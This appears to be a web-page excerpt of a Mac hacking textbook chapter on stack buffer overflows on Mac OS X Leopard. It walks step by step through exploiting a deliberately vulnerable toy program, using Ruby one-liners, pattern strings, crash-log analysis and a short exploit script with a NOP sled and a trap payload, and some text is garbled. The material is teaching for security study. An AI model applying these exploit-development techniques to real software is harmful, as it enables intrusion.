The Mac Hacker's Handbook - Part 3 (последняя)
Translations of this material:
- into Belarusian: Перевод "The Mac Hacker's Handbook - Part 3 (последняя)". Translation is not started yet.
-
Submitted for translation by berezka 11.01.2010
Published 2 years, 4 months ago.
- into Russian: The Mac Hacker's Handbook - Part 3 (последняя). 23% translated in draft.
-
Submitted for translation by r00t 04.06.2009
Text
Глава 7 Использование стековых переполнений
The stack buffer overflow is the "classic" buffer-overflow vulnerability. This vulnerability class has been known publicly since at least November 1988, when the Robert Morris Internet worm exploited a stack buffer overflow in the BSD finger daemon on VAX machines.
A connection was established to the remote finger service daemon and then a specially constructed string of 536 bytes was passed to the daemon, overflowing its input buffer and overwriting parts of the stack.
—Eugene H. Spafford, "The Internet Worm Program: An Analysis"
Stack buffer overflow attacks and defenses have evolved significantly since then, but the core principles have remained the same: overwrite the function return address, and redirect execution into dynamically injected code, com¬monly referred to as the shellcode or the exploit payload.
In Leopard, Apple has implemented several defenses against the exploitation of stack buffer overflows, including randomizing portions of the process memory address space, making thread stack segments non-executable on the x86 architec¬ture, and leveraging the GNU C compiler's stack protector in some executables.
This chapter starts with background on how the stack works in Mac OS X, what happens when the stack is "smashed," and how to exploit a simple stack buffer overflow vulnerability. Subsequent sections will detail the stack buffer overflow exploit protections in Leopard and how to overcome them in real-world exploits.
We will start demonstrating these vulnerabilities with simple attack strings to trigger the vulnerabilities. The attack string is the crafted input in an exploit that triggers or exploits a vulnerability. It does not typically include various protocol or syntax elements that may be needed to reach the vulnerability, but it will typically include the injection vector (the elements or aspects of the attack string that are used to obtain control of the target), and the payload (the position-independent machine code that is injected and executed by the target). A com¬plete exploit will include the necessary functionality to trigger the vulnerability, the injection vector to take full control, the payload to be executed by the target, and local payload handlers to implement attacker-side functionality. In most of this chapter and the next we will demonstrate various injection vectors using simplified payloads that avoid adding unnecessary complications at this early stage. In later chapters we will discuss how to build full shell code and other more-complicated exploit payloads, as well as topics like payload encoders and application-specific attacks.
Stack Basics
To understand how a stack buffer overflow works, it is important first to under¬stand what the stack is and how it is used under normal circumstances. The stack is a special region of memory that is used to support calling subroutines (typically called functions in source-code form). The stack is used to keep track of subroutine parameters, local variables, and where to resume execution after the subroutine has completed. On most computer architectures, including all of the architectures supported by Mac OS X, the stack automatically grows downward toward lower memory addresses.
Stack memory is divided into successive frames where each time a subroutine is called, even if it is recursive and calls itself, it allocates itself a fresh stack frame. The current bottom of the stack is pointed to by a special register used as the stack pointer and the top of the current stack frame is usually pointed to by another special register used as the frame pointer. Values are typically read or written to the stack and then the stack pointer is adjusted accordingly to point to the new bottom of the stack. This is referred to as pushing when new values are written to the stack, and popping when values are read from the stack.
Exactly how the stack is used depends on the calling conventions specific to the architecture for which the program binary was compiled. The calling conventions define how subroutines are called and what actions are taken in the subroutine's prolog and epilog, the code inserted by the compiler before and after the function body, respectively. The stack may be used to store subroutine parameters, linkage, saved registers, and local variables, but some architectures may use registers for some of these purposes. The stack is used most extensively on x86, where there are relatively few general-purpose registers; on PowerPC where there are more general-purpose registers available, registers are used for subroutine parameters and linkage. In this chapter we will focus on the exploitation of stack-buffer overflows on the 32-bit PowerPC and x86 architec-tures. While Leopard also supports 64-bit PowerPC and x86-64 binaries, very few security-sensitive applications are compiled for the 64-bit architectures. Therefore we will only focus on the 32-bit architectures in this book.
Stack Usage on PowerPC
The PowerPC calling convention places subroutine parameters in registers where possible for higher performance. Register-sized parameters are placed in registers r3 through r10, but space is still reserved on the stack for them in case the called function needs to use those registers for another purpose. Any arguments larger than the register size are pushed onto the stack.
One notable difference between the PowerPC architectures and the x86 archi¬tectures is that the PowerPC uses a dedicated link register (lr) instead of the stack to store the return address when a subroutine is called. To support sub¬routines calling other subroutines, the value of that register must be saved to the stack. In effect, this means stack-buffer overflows are still exploitable; they only obtain control a little later, after the restored (and overwritten) link register is actually used.
The subroutine prolog, shown below, allocates itself a stack frame by decre¬menting the stack pointer, saving the old values of the stack pointer and link register to the stack, and finally saving the values of any nonvolatile registers that get clobbered by the subroutine.
00001f64 mfspr r0,lr ; Obtain value of link register
...
The subroutine epilog, shown below, reverses this process by restoring nonvolatile registers, restoring the link register and stack pointer, and finally branching to the link register to return from the subroutine.
00001f88
00001f8c
00001f90
00001f94
..
Return from subroutine
The PowerPC stack usage conventions also define the area below the stack pointer as the red zone, a scratch storage area that the subroutine may use tem¬porarily knowing that it will be overwritten when it calls another subroutine. Figure 7-1 shows the layout of a PowerPC stack frame, including the red zone scratch space.
картинка 7-1
Stack Usage on x86
Since there are few general-purpose registers on x86, the stack is used quite extensively. We will cover the basic concepts here, but for a comprehensive treat¬ment of how the stack is used on x86, consult The Art of Assembly Language (No Starch, 2003). There are several calling conventions possible on the x86 architec¬ture, but Mac OS X uses a single calling convention on x86, which is what we will describe here. When a subroutine is called, the caller pushes the parameters on the stack and executes the call instruction, which pushes the address of the next instruction onto the stack and transfers control to the subroutine. The function prolog pushes the caller's frame pointer onto the stack, moves the stack pointer value to use as its own frame pointer, pushes clobbered registers to the stack, and finally allocates space for its own local variables by subtracting their total size from the stack pointer. A simple function prolog is shown below.
1fc6: push ebp
1fc7: mov ebp,esp
1fc9: sub esp,0x418
The called subroutine must save the values of the following registers and restore them before returning if it changes (clobbers) their values: EBX, EBP, ESI, EDI, and ESP. The function epilog reverses this process by issuing the leave instruction to restore the ESP register from EBP and issuing the ret instruction to jump to the return address stored on the stack.
1fe4: leave
1fe5: ret
Figure 7-2 shows the layout of an x86 stack frame.
картинка 7-2
Smashing the Stack on PowerPC
You now know how a correctly running program uses the stack. What is more interesting, however, is what happens when things go wrong, and especially what happens when an attacker intentionally makes things go wrong. For the first example, we will demonstrate how to exploit a simple, local stack buffer overflow on PowerPC, intentionally ignoring Leopard's Library Randomization for the moment. Leopard's Library Randomization changes the load addresses of system frameworks and libraries when system libraries or default applica¬tions are changed. Since this only happens periodically, it does not affect the exploitation of local vulnerabilities.
Our first example will examine a trivially simple program with a stack buffer overflow vulnerability.
исходник
We will show you how to develop an exploit for this vulnerability incremen¬tally by creating the attack string with one-line Ruby (an open-source, object-oriented scripting language installed by default on Mac OS X and available at http://www.ruby-lang.org) scripts and examining the results in ReportCrash logs and GDB. On Leopard, ReportCrash replaces the CrashReporter daemon present in older releases of Mac OS X but it still stores its logs in ~/Library/ Logs/CrashReporter and /Library/Logs/CrashReporter for legacy compat¬ibility. Where possible, we will try to use only the ReportCrash output since running a process in the debugger may change several aspects of its execution. For example, the values of the stack pointer will be different because GDB and the dynamic linker (dyld) communicate through some special environment variables that are not present when the program is not running under GDB, adding more space to the environment variables stored on the stack.
If you run this program with an overly long first argument consisting of all ASCII 'A' characters, it will crash after it tries to return from the smashmystack() function. You can do this with a simple Ruby one-liner that prints a string of 2000 ASCII 'A' characters, as shown below.
% ./smashmystack.ppc "ruby -e 'puts "A" * 2000'" Segmentation fault
Examining the ReportCrash log reveals the following:
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000041414140 Crashed Thread: 0
Thread 0 Crashed:
0 ??? 0x41414140 0 + 1094795584
Thread 0 crashed with PPC Thread State 32:
srr0: 0x41414140 srr1: 0x4000f030 dar: 0x00003138 dsisr: 0x40000000
r0: 0x41414141 r1: 0xbfffe9b0 r2: 0x00000001 r3: 0xbfffe598
...
You can easily spot which registers you control; look for registers with the hexadecimal value 0x41414141, the hexadecimal value of the ASCII string "AAAA." The attack string has clearly corrupted the r0, r30, r31, and lr registers. The most important register to control is the link register lr, since it contains the address where execution will resume when the subroutine returns using the blr instruction. Since you can control the lr register, you can control the execution of the target program.
In order to place chosen values in controlled registers, you will first need to identify the locations in the attack string that correspond to the overwritten values of each controlled register. This can be done using a specially patterned string that will let you quickly calculate the position in the pattern string based on the register's value. The pattern consists of every ASCII character from 'A' to 'z', each repeated four times. To find the offset in the pattern string from which the regis¬ter's value is taken, subtract 0x41 (the hexadecimal ASCII value for 'A') from the repeated hexadecimal byte value in the register, convert to decimal, and multiply by 4. For example, if a register's value is 0x58585858, then it is (0x58 - 0x41) x 4 =
0x17 x 4 = 23 x 4 = 92 bytes from the beginning of the pattern string. The pattern string is generated by the following Ruby code.
pattern = (('A,..,Z,).to_a + ['[', 'W, ']', ,л', ,%'] +
('a'..lzl).to_a).inject(n") {|s, c| s += c.to_s * 4}
In the following examples, you can assume that this variable is already defined (for brevity). Metasploit uses a similar pattern string, but the string used here is better for determining proper alignment and is somewhat easier to spot in register-value dumps, at the expense of some flexibility.
Now we will demonstrate how you can use the pattern string to identify the offsets into your attack string where the controlled registers get their values. You know that the stack buffer is 1,024 bytes long, so now you should run smashmystack.ppc with an argument generated by
arg0 = "Z" * 1024 + pattern
This will result in the following crash dump to appear in the ReportCrash
log:
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x0000000049494948
Crashed Thread: 0
Thread 0 Crashed:
0 ??? 0x49494948 0 + 1229539656
Thread 0 crashed with PPC Thread State 32:
srr0: 0x49494948 srr1: 0x4000f030 dar: 0x00003138 dsisr: 0x40000000
r0: 0x49494949 r1: 0xbfffef50 r2: 0x00000001 r3: 0xbfffeb38
The offsets in the pattern string for the controlled registers are as follows:
■ r30 = 16 bytes
■ r31 = 20 bytes
■ r0, lr = 32 bytes
This means our attack string will have the following format:
[ 1040 bytes space ] [ r30 ] [ r31 ] [ 8 bytes space ] [ lr ]
Recall from the PowerPC subroutine epilog earlier in this chapter that the value for the link register is loaded from 8 bytes past the stack pointer. In this example, we will hard-code the stack memory address of our payload in our attack string at the offset for the overwritten link register (lr). The chosen value for the link register must be 12 bytes greater than the value of the stack pointer, so that the target program will return to and execute the bytes from the attack string immediately following the value for lr. This is the location in the attack string where you should place your shellcode or other payload.
For an initial payload, you can simply use a single breakpoint trap instruc¬tion. This will allow you to verify that you are executing your exploit payload without having to worry about the payload failing for any other reason. You can also use a variation of this to figure out how much space you have available for your payload in the attack string. If you test the exploit with a payload of many no-operation (or NOP) instructions with a single breakpoint trap instruction at the end and the exploit causes the program to crash with a breakpoint excep¬tion, you know the entire payload was executed. A sequence of repeated NOP instructions is usually referred to as a NOP slide or NOP sled.
At this point, the attack string is complex enough that it makes sense to put it together in a complete script rather then regenerating it on the command-line each time. The following Ruby script shows how to programmatically generate the attack string for this simple exploit.
#!/usr/bin/env ruby
NOP = [0x30800114].pack('N') TRAP = [0x7c852808].pack('N')
r30 = "AAAA" r31 = "BBBB"
lr = [0xdeadbeef].pack('N')
payload = NOP * 256 + TRAP
puts "Z" * 1040 + r30 + r31 + "Z" * 8 + lr + payload
The first time that you run this exploit, you should use a special invalid value for the link register (the script above uses 0xdeadbeef). This will allow you to run the exploit once, record the value of the stack pointer from the ReportCrash thread state listing, and use that to calculate the correct value for the link regis¬ter. Recall that the payload in your attack string will start 12 bytes after the value of the stack pointer when the target program branches to the link register.
% ./smashmystack.ppc %./exp.rb% Segmentation fault
The ReportCrash log looks like the following:
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x00000000deadbeec Crashed Thread: 0
Thread 0 Crashed:
0 ??? 0xdeadbeec 0 + 3735928556
Thread 0 crashed with PPC Thread State 32:
srr0: 0xdeadbeec srr1: 0x4000f030 dar: 0x00003138 dsisr: 0x40000000
r0: 0xdeadbeef r1: 0xbfffe8d0 r2: 0x00000001 r3: 0xbfffe4b8
© Copyright 2009 by Wiley Publishing, Inc., Indianapolis, Indiana.
